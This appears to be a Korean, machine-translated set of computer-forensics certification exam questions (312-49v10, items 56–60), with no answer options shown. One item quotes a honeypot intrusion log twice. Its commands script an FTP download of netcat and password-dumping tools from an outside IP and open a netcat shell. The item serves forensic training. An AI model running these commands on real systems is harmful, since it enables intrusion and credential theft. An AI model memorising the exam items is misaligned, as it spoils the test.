312-49v10 문제 56
가상 테스트 환경에서 Michael은 인터넷 백본을 모방하기 위해 여러 라우터를 사용하여 BGP의 강도와 보안을 테스트하고 있습니다. 이 프로젝트는 그가 "인터넷을 없애기"에 대한 박사 학위 논문을 쓰는 데 도움이 될 것입니다. 라우터 간의 트래픽을 스니핑하지 않고 Michael은 라우터 중 하나 또는 모두를 종료하기 위해 수백만 개의 RESET 패킷을 라우터로 보냅니다. 몇 시간 후 라우터 중 하나가 마침내 자체적으로 종료됩니다. 다른 라우터는 그들 사이에서 무엇을 통신합니까?
312-49v10 문제 57
당신은 1,000,000명의 인구에게 서비스를 제공하는 지역 경찰서에서 일하고 있으며 컴퓨터 포렌식 랩을 구축하는 임무를 받았습니다. 얼마나 많은 법 집행 컴퓨터 수사관을 연구소 직원에게 요청해야 합니까?
312-49v10 문제 58
다음은 lab.wiretrip.net에서 호스팅된 허니팟 로그에서 발췌한 것입니다. Snort는 213.116.251.162에서 유니코드 공격을 보고했습니다. File Permission Canonicalization 취약점(UNICODE 공격)은 일반적으로 스크립트를 실행할 수 있는 권한이 없는 임의의 폴더에서 스크립트를 실행할 수 있도록 합니다. 공격자는 유니코드 공격을 시도하고 결국 boot.ini를 표시하는 데 성공합니다.
그런 다음 msadcs.dll을 통해 RDS를 사용하는 것으로 전환합니다. RDS 취약점으로 인해 악의적인 사용자는 IIS 서버에서 셸 명령(예: CMD.EXE)을 실행할 SQL 문을 구성할 수 있습니다. 그는 빠른 쿼리를 수행하여 디렉터리가 존재하는지 발견하고 msadcs.dll에 대한 쿼리는 디렉터리가 올바르게 작동하고 있음을 보여줍니다. 공격자는 RDS 쿼리를 만들어 아래와 같이 명령을 실행합니다.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c 에코 johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c 에코 종료 >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
주어진 익스플로잇에서 무엇을 추론할 수 있습니까?
그런 다음 msadcs.dll을 통해 RDS를 사용하는 것으로 전환합니다. RDS 취약점으로 인해 악의적인 사용자는 IIS 서버에서 셸 명령(예: CMD.EXE)을 실행할 SQL 문을 구성할 수 있습니다. 그는 빠른 쿼리를 수행하여 디렉터리가 존재하는지 발견하고 msadcs.dll에 대한 쿼리는 디렉터리가 올바르게 작동하고 있음을 보여줍니다. 공격자는 RDS 쿼리를 만들어 아래와 같이 명령을 실행합니다.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c 에코 johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c 에코 종료 >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
주어진 익스플로잇에서 무엇을 추론할 수 있습니까?
312-49v10 문제 59
다음 중 동적 맬웨어 분석의 일부인 프로세스는 무엇입니까?
312-49v10 문제 60
검사에서 일하는 동안 발견한 증거가 무죄로 보이며 피고인에게 공개되지 않으면 어떻게 해야 한다고 생각하십니까?